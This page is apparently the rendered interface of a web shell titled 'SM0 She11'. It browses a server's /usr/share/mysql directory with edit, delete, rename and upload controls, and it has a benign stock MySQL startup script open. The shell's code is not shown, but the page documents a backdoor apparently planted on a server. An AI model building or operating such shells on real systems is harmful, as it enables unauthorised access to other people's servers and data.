SM0 She11
Path:
/
/
usr
/
share
/
mysql
Full Path (server): /usr/share/mysql
Create Fil3
Upl04d Fil3
📄 binary-configure
[E]
[D]
[R]
📁 charsets
Open
[D]
[R]
📁 czech
Open
[D]
[R]
📁 danish
Open
[D]
[R]
📁 dutch
Open
[D]
[R]
📁 english
Open
[D]
[R]
📄 errmsg-utf8.txt
[E]
[D]
[R]
📁 estonian
Open
[D]
[R]
📄 fill_help_tables.sql
[E]
[D]
[R]
📁 french
Open
[D]
[R]
📁 german
Open
[D]
[R]
📁 greek
Open
[D]
[R]
📁 hungarian
Open
[D]
[R]
📄 install_spider.sql
[E]
[D]
[R]
📁 italian
Open
[D]
[R]
📁 japanese
Open
[D]
[R]
📁 korean
Open
[D]
[R]
📄 magic
[E]
[D]
[R]
📄 maria_add_gis_sp.sql
[E]
[D]
[R]
📄 maria_add_gis_sp_bootstrap.sql
[E]
[D]
[R]
📄 my-huge.cnf
[E]
[D]
[R]
📄 my-innodb-heavy-4G.cnf
[E]
[D]
[R]
📄 my-large.cnf
[E]
[D]
[R]
📄 my-medium.cnf
[E]
[D]
[R]
📄 my-small.cnf
[E]
[D]
[R]
📄 mysql-log-rotate
[E]
[D]
[R]
📄 mysql.server
[E]
[D]
[R]
📄 mysql_performance_tables.sql
[E]
[D]
[R]
📄 mysql_system_tables.sql
[E]
[D]
[R]
📄 mysql_system_tables_data.sql
[E]
[D]
[R]
📄 mysql_test_data_timezone.sql
[E]
[D]
[R]
📄 mysql_to_mariadb.sql
[E]
[D]
[R]
📄 mysqld_multi.server
[E]
[D]
[R]
📁 norwegian
Open
[D]
[R]
📁 norwegian-ny
Open
[D]
[R]
📁 policy
Open
[D]
[R]
📁 polish
Open
[D]
[R]
📁 portuguese
Open
[D]
[R]
📁 romanian
Open
[D]
[R]
📁 russian
Open
[D]
[R]
📁 serbian
Open
[D]
[R]
📁 slovak
Open
[D]
[R]
📁 spanish
Open
[D]
[R]
📁 swedish
Open
[D]
[R]
📁 systemd
Open
[D]
[R]
📁 ukrainian
Open
[D]
[R]
📄 wsrep.cnf
[E]
[D]
[R]
📄 wsrep_notify
[E]
[D]
[R]
Editing: binary-configure
#!/bin/sh SCRIPT_NAME="`basename $0`" usage() { echo "Usage: ${SCRIPT_NAME} [--help|-h]" echo "" echo "This script creates the MySQL system tables and starts the server." } for arg do case "$arg" in --help|-h) usage exit 0 ;; *) echo "${SCRIPT_NAME}: unknown option $arg" usage exit 2 ;; esac done if test ! -x ./scripts/mysql_install_db then echo "I didn't find the script './scripts/mysql_install_db'." echo "Please execute this script in the mysql distribution directory!" exit 1; fi echo "NOTE: This is a MySQL binary distribution. It's ready to run, you don't" echo "need to configure it!" echo "" echo "To help you a bit, I am now going to create the needed MySQL databases" echo "and start the MySQL server for you. If you run into any trouble, please" echo "consult the MySQL manual, that you can find in the Docs directory." echo "" ./scripts/mysql_install_db --no-defaults if [ $? = 0 ] then echo "Starting the mysqld server. You can test that it is up and running" echo "with the command:" echo "./bin/mysqladmin version" ./bin/mysqld_safe --no-defaults & fi
Save